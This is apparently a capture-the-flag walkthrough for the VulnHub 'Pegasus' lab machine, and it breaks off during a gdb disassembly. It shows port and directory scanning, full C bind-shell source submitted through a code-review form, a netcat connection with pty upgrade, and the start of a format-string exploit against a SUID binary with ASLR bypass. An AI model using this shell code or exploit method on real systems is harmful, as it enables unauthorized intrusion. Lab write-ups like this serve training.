URL : https://www.vulnhub.com/entry/pegasus-1,109/

1.) Identify the IP address of the victim machine
root@kali:~# netdiscover
 Currently scanning: 192.168.17.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.0.1     c4:a8:1d:2e:2d:1c    01    060   Unknown vendor
 192.168.0.5     00:0c:29:57:54:7e    01    060   VMware, Inc.
 192.168.0.6     40:f0:2f:57:6c:13    01    060   Unknown vendor

2.) Run an nmap syn scan to identify open ports and running services
root@kali:~# nmap -p 1-65535 -sV -sS -A -T4 192.168.0.5

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 22:45 PDT
Nmap scan report for 192.168.0.5
Host is up (0.00079s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 77:89:5b:52:ed:a5:58:6e:8e:09:f3:9e:f1:b0:d9:98 (DSA)
|   2048 d6:62:f5:12:31:36:ed:08:2c:1a:5e:9f:3c:aa:1f:d2 (RSA)
|_  256 c5:f0:be:e5:c0:9c:28:6e:23:5c:48:38:8b:4a:c4:43 (ECDSA)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37749/udp  status
|_  100024  1          43130/tcp  status
8088/tcp  open  http    nginx 1.1.19
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-title: Pegasus Technologies - Under Construction
43130/tcp open  status  1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37749/udp  status
|_  100024  1          43130/tcp  status
MAC Address: 00:0C:29:57:54:7E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.79 ms 192.168.0.5

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.58 seconds

3.) Testing the HTTP service running on 8088
http://192.168.0.5:8088/
root@kali:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt --hc 404 http://192.168.05:8088/FUZZ

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.05:8088/FUZZ
Payload type: file,/usr/share/wfuzz/wordlist/general/megabeast.txt

Total requests: 45463
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

00001:  C=200      9 L        18 W          189 Ch        " - admin"
00002:  C=200      9 L        18 W          189 Ch        " - bak"
00003:  C=200      9 L        18 W          189 Ch        " - Admin"
00004:  C=200      9 L        18 W          189 Ch        " - Backup"
00005:  C=200      9 L        18 W          189 Ch        " - warez"
00006:  C=200      9 L        18 W          189 Ch        " - pr0n"
00007:  C=200      9 L        18 W          189 Ch        " - Scripts"
00008:  C=200      9 L        18 W          189 Ch        " - porn"
00010:  C=200      9 L        18 W          189 Ch        " - IISSamples"
00009:  C=200      9 L        18 W          189 Ch        " - IISHelp"
00011:  C=200      9 L        18 W          189 Ch        " - IISAdmin"
00012:  C=200      9 L        18 W          189 Ch        " - MSADC"
00013:  C=200      9 L        18 W          189 Ch        " - PBServer"
00014:  C=200      9 L        18 W          189 Ch        " - _vti_bin"


Every request comes back with a 200 OK response
This shows that it returns the same image for every request
Fuzz for resources with the extension php
root@kali:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt --hc 404 http://192.168.05:8088/FUZZ.php

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.05:8088/FUZZ.php
Payload type: file,/usr/share/wfuzz/wordlist/general/megabeast.txt

Total requests: 45463
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

39946:  C=200      0 L         4 W           19 Ch        " - submit"

Now try access the page
http://192.168.0.5:8088/submit.php
Page says "No data to process."

Trying a different wordlist
root@kali:~# wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://192.168.05:8088/FUZZ.php

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.05:8088/FUZZ.php
Payload type: file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Total requests: 220560
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

89252:  C=200     14 L        58 W          488 Ch        " - codereview"

Now try access the page
http://192.168.0.5:8088/codereview.php
Page Source:
<html>
	<head>
		<title>Pegasus Technologies - Code Review</title>
	</head>
	<body>
		<h1>Code review</h1>
		<p>Note: our trainee (Mike) will be reviewing the code until we come up with an official process and a proper portal for code submission.</p>
		<p>In the meantime, please use the form below.</p>
		<form action="submit.php" method="post">
			<textarea name="code" id="textarea" cols=60 rows=30></textarea><br/>
			<input type="submit" value="Submit" />
		</form>
	</body>
</html>
Looking into the source code we can see that this page finally submits the POST data to submit.php

Now submit a bind shell written in C
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>

int main(void)
{
        int clientfd, sockfd;
        int dstport = 4444;
        int o = 1;
        struct sockaddr_in mysockaddr;

        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        //setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o)); //a luxury we don't have space for

        mysockaddr.sin_family = AF_INET; //2
        mysockaddr.sin_port = htons(dstport);
        mysockaddr.sin_addr.s_addr = INADDR_ANY; //0

        bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));

        listen(sockfd, 0);

        clientfd = accept(sockfd, NULL, NULL);

        dup2(clientfd, 0);
        dup2(clientfd, 1);
        dup2(clientfd, 2);

        execve("/bin/sh", NULL, NULL);
        return 0;
}

Checking if port 4444 is open
root@kali:~# nmap -sS -p4444 192.168.0.5

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 23:23 PDT
Nmap scan report for 192.168.0.5
Host is up (0.00019s latency).
PORT     STATE SERVICE
4444/tcp open  krb524
MAC Address: 00:0C:29:57:54:7E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

4.) Connecting to 4444 using netcat 
Use python to get a TTY enabled shell
root@kali:~# nc -nv 192.168.0.5 4444
(UNKNOWN) [192.168.0.5] 4444 (?) open
python -c 'import pty;pty.spawn("/bin/bash")'
mike@pegasus:/home/mike$ id
id
uid=1001(mike) gid=1001(mike) groups=1001(mike)
mike@pegasus:/home/mike$

5.) Looking around we find a binary with SUID bit enabled
mike@pegasus:/home/mike$ ls -l
ls -l
total 16
drwx------ 2 mike mike 4096 Nov 18  2014 Mail
-rwxr-xr-x 1 mike mike  845 Nov 18  2014 check_code.sh
-rwsr-xr-x 1 john john 6606 Nov 28  2014 my_first
mike@pegasus:/home/mike$ ./my_first
./my_first
WELCOME TO MY FIRST TEST PROGRAM
--------------------------------
Select your tool:
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit
Selection: 1
1
Enter first number: 5
5
Enter second number: AAAA
AAAA
Error details: AAAA

Testing for format string vulnerabilities
mike@pegasus:/home/mike$ ./my_first
./my_first
WELCOME TO MY FIRST TEST PROGRAM
--------------------------------
Select your tool:
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit
Selection: 1
1
Enter first number: 5
5
Enter second number: %x
%x
Error details: bf9282ac
This shows us that the binary is vulnerable to format strings
Check to see if ASLR is enabled
mike@pegasus:/home/mike$ cat /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
2
ASLR is enabled
We can disable it as it is a 32 bit machine
mike@pegasus:/home/mike$ uname -a
uname -a
Linux pegasus 3.13.0-39-generic #66~precise1-Ubuntu SMP Wed Oct 29 09:59:20 UTC 2014 i686 i686 i386 GNU/Linux

ulimit -s unlimited will enlarges the stack and fixes the address of libc
mike@pegasus:/home/mike$ ulimit -s unlimited
ulimit -s unlimited
mike@pegasus:/home/mike$ ldd my_first
ldd my_first
        linux-gate.so.1 =>  (0x40022000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x4002a000)
        /lib/ld-linux.so.2 (0x40000000)
mike@pegasus:/home/mike$

Check for addresses of functions in the program
mike@pegasus:/home/mike$ objdump -R my_first
objdump -R my_first

my_first:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049bec R_386_GLOB_DAT    __gmon_start__
08049c20 R_386_COPY        stdin
08049bfc R_386_JUMP_SLOT   printf
08049c00 R_386_JUMP_SLOT   fgets
08049c04 R_386_JUMP_SLOT   puts
08049c08 R_386_JUMP_SLOT   __gmon_start__
08049c0c R_386_JUMP_SLOT   __libc_start_main
08049c10 R_386_JUMP_SLOT   putchar
08049c14 R_386_JUMP_SLOT   strtol
Address of printf is 08049bfc

Finding the address of system
mike@pegasus:/home/mike$ gdb -q ./my_first
gdb -q ./my_first
Reading symbols from /home/mike/my_first...(no debugging symbols found)...done.
(gdb) b main
b main
Breakpoint 1 at 0x804850f
(gdb) r
r
Starting program: /home/mike/my_first

Breakpoint 1, 0x0804850f in main ()
(gdb) p system
p system
$1 = {<text variable, no debug info>} 0x40069060 <system>
(gdb)
So the address of system is 40069060
Overwrite the address of printf with system and execute /bin/dash
Find a function before printf to break, so disassemble the main function
mike@pegasus:/home/mike$ gdb -q ./my_first
gdb -q ./my_first
Reading symbols from /home/mike/my_first...(no debugging symbols found)...done.
(gdb) disas main
disas main
Dump of assembler code for function main:
   0x0804850c <+0>:     push   %ebp
   0x0804850d <+1>:     mov    %esp,%ebp
   0x0804850f <+3>:     and    $0xfffffff0,%esp
   0x08048512 <+6>:     sub    $0x20,%esp
   0x08048515 <+9>:     movl   $0x8048870,(%esp)
   0x0804851c <+16>:    call   0x80483d0 <puts@plt>
   0x08048521 <+21>:    movl   $0x8048894,(%esp)
   0x08048528 <+28>:    call   0x80483d0 <puts@plt>
   0x0804852d <+33>:    movl   $0x80488b5,(%esp)
   0x08048534 <+40>:    call   0x80483d0 <puts@plt>
   0x08048539 <+45>:    movl   $0x80488c7,(%esp)
   0x08048540 <+52>:    call   0x80483d0 <puts@plt>
   0x08048545 <+57>:    movl   $0x80488d6,(%esp)
   0x0804854c <+64>:    call   0x80483d0 <puts@plt>
   0x08048551 <+69>:    movl   $0x80488e8,(%esp)
   0x08048558 <+76>:    call   0x80483d0 <puts@plt>
   0x0804855d <+81>:    movl   $0x80488fb,(%esp)
   0x08048564 <+88>:    call   0x80483d0 <puts@plt>
   0x08048569 <+93>:    movl   $0x8048905,(%esp)
   0x08048570 <+100>:   call   0x80483b0 <printf@plt>
   0x08048575 <+105>:   mov    0x8049c20,%eax
   0x0804857a <+110>:   mov    %eax,0x8(%esp)
---Type <return> to continue, or q <return> to quit---
So the address of our choice is 0x08048569
